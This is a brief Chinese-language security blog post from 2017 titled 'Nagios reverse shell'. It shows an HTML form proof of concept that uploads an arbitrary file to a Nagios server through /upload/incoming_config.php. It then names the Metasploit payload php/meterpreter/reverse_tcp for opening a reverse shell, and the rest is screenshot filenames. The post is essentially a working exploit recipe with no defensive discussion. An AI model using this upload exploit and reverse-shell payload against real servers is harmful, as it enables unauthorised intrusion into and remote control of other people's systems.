MENU

Nagios反弹Shell

October 25, 2017 • Security

Nagios/upload/incoming_config.php任意文件上传

PoC:

<form enctype="multipart/form-data" action="https://<IPADDRESS>/upload/incoming_config.php" method="POST">
Choose a file to upload: <input name="file" type="file" /><br />
Action (extract, copy, move): <input name="remote_action" type="text" /> <br />
<input type="submit" value="Upload File" />
</form>

Nagios2.png

Metaspliot:

payload/php/meterpreter/reverse_tcp

Nagios3.png

Nagios4.png

Archives QR Code
QR Code for this page
Tipping QR Code